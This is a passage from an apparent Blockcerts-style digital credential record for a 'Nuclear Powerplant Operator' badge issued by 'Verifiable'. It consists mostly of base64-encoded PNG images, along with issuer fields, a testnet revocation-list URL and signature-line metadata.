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',
'name': 'Verifiable',
'revocationList': 'https://gist.githubusercontent.com/faustow/07a66855d713409067ff28e10778e2dd/raw/e08bb6d6f1350367d3f6d4f805ab3b1466b584d7/revocation-list-testnet.json',
'type': 'Profile',
'url': 'https://verifiable.com'},
'name': 'Nuclear Powerplant Operator',
'signatureLines': [{
'image': 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJcAAABVBAMAAAC2kWv1AAAAMFBMVEX///8AAAC/v79/f39fX1+fn5/f398/Pz8fHx/Dw8NTU1Onp6cvLy93d3cnJydvb28isqiqAAAACXBIWXMAAA7EAAAOxAGVKw4bAAADQElEQVRYhe2WS27bMBCGp5RIudsCRbasX8iqUJ3Y3hIO7HZJSJayKAqw8StLIYnTLpNFnCv0BL1NT9MLdEhJzkNSEkfaFNAPmKQl6tNwNDMkQK1atV4nyqtjsbPqWODwCmF+hSyIKmTZvELYvEIWXFbIIgJgaUZMlobZwfAiphwHZVnz6/NuPCJRqyyMvE8G7HQpCC8HY1dJvx5Pg7AcCyy5AgihvyDrbkkUqAb0gbwjG26rkijyY9NiETSuaADOawD3Az5siEtLwoFrS5i9BnYRdwxWiqr9ZdQA0ubfOcKY2hFFJI8HCzYEDw6p24aFA4f4JSA3Zslhv5A1lEL3S3BPOkxQz1EjkDZs8JqfZxgb62+dKxYCucK+9ZOFXDiqKxzYULCnoujtU3xDgTc7uBoXf/zYXjB3yrhowWYAbwuDVc+GVcYms0hM6AYH5sL5SlpqfeLJHgwVtHpFsAPdtHVD77HWutVR8UvfpP1P3IE93lFYsjlWjgIW0YbFe4RpkmQx99CZXR/ob5Cjc0SO0BsRMF5cueNANtXTbBRJspirF+i0Hnx1KUQc+lgRW0RgSOBDKh9mls80hwpy+zlMksXowxEHYa1CCREL/jQ5tagEd2tBVkI3li6dTXk9sFtJshjRPfzOkzc3wG48OAM3pDa3tFFFJda4rIE/0lFH4KTJYjTf1y1RzMdZRxBw6iwHW4cUwbTrmzbWvVmaLGbxkzieiGchff/bANjHvypdSJ6autnorcbC1YltsuhnvHixIejaRTS5oYzFBSzQZZy6Oti9UzwrZZMFWXcOjz/jg/uPhVMw2Mc+monJwh4ki37RnSkmwCz1FKxtVjueoJXDRxOpcfj26xn04CkWTPRZkK572R2CjZIJ6f/oOcMwJAcw+6JY9s5BMmF7wU9sLRRzfWgP8qrQnJuOiLu5z+6VvmrLPE/QBGLxZwAPNJO6aGWULHK3XY1Nct1qpfydDijaXZ3s5Wk6mGTvFcuFvFWy6PHgRZK5hm0r4G7+X7JOzvxVZvAyNVXOxW0OjXaD5SqFEVEBLE2JSs79VtLvFBhFSqKl9Akx1kxjWCWGoQIOpPC0tbM6gVcZq1atWrVq1fqP9Q9Wkn4v31JdhQAAAABJRU5ErkJggg==',
'jobTitle': 'University Issuer',
'name': 'Your signature',
'type': ['SignatureLine', 'Extension']}],
'type': 'BadgeClass'},
'displayHtml': '<div class="sc-EHOje kcwAhk" style="font-family: Lato; text-align: left;"> <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAPoAAAD6CAIAAAAHjs1qAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAgY0hSTQAAeiYAAICEAAD6AAAAgOgAAHUwAADqYAAAOpgAABdwnLpRPAAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAASAAAAEgARslrPgAAZLdJREFUeNrlvdeSJTeSKOiOiDgqdWZpwSqyqJtkD1uy587YjNnY3Lv7Afu6v7C2+0n7G3dt1+zODJu8Q1VNUWw2RZEslkhRqY+MgO9DKAgHEJF5kqwiYWTWQQABuDscDneHA4H/1//9GQABARCUycqCkiVAUvL1c1JeASAyS60sktoDQeMsVg0CkJ4tqplZBS8FQiQgDYwwzCaOee9sqUqTCgANpDJLAABIystkV/bCYLdftKy3aXahESpMRnaUyWhQRyRMVRMq9MNsNN4yiWK4EMpxs7NovoSOLrHBk1BBkwrqZERU/zGeQo0d1yoh89CsjHqbXD+U/0J0Ql09N+dDXUpowWFPHhdBguQki0rIVCGDbsGkoswykqu7pu1bMGPDN/kkTCrwsGgDSYAuBgpwPMttXBdWZbvUmnMujq9bc1fw09ANGNms5uN4g24aUgj2LPVm9R4Jy5VG7cI1TDYRsFkpM6XNPBl1/ONiN+an56m4PWf3Cg1VoqN/mNtwPLDMl5OmQQuogKSV6hyfCz8PoVm41F/m6DYlrdKIwXAcc3DTuOkqGOIVRgQEOV5PASHCIKW8UQ8r15lL6ptCEAOgnoLjhZbzCVSFFRAQaq2Vp4stO01loFR6VSZ2KhI6SHxln/Bj3gIARLJZpHmbbKlNhwbDU4MRXmmNcv8iaHG8Z01z0g29ldHXiIeqaJGxpoaXaM1IyiahY4UgdEyMrCKVNe3Av/jyODsK0JVlyImIhR7v6pHlHp070cOsBo6OOZwDUFsU9mquoWxnC6g0jndxGzIoqONC0JIb0EFSDxn9+jSj0IbmmPDCLNCscFKOF+EqDuODgm8BNFRGFQFvKrNKZaPlEgalzTrrE/CWLKlsX5cSpT3kyay7kTjXBEtMl2HHE9NnCFWlCBbHBwW8MiENkvJk9LeZIx0wpQJoE4aNhBMk0bIdt83qQqMV2i6OZ/E1dD4/cbwqTcAOcen0XKlrkW+UNTQrp8LAWZB6soYmyG06Fv6VuclzdGjwThjcIFU4Ga+3539Odw+KHL+ebbIh+bJ2fab3AF2cHOav15Dj7YfuxbrwS4aVOvcS5OT4UDJ7MeludeQQ4eUTp3huwvEVLtpK4pilNddpTZOvg/L1lhwvnKphLcm4Jj0c31Ch16s53XkYzirOa24tbuyppeo1xIDscSxiuVKEdoXGixiSzSUcBcCZJdXZ41wfvI1UWEBI9qHOOadUNyxFi/xGArQY3DwJUptzwoEu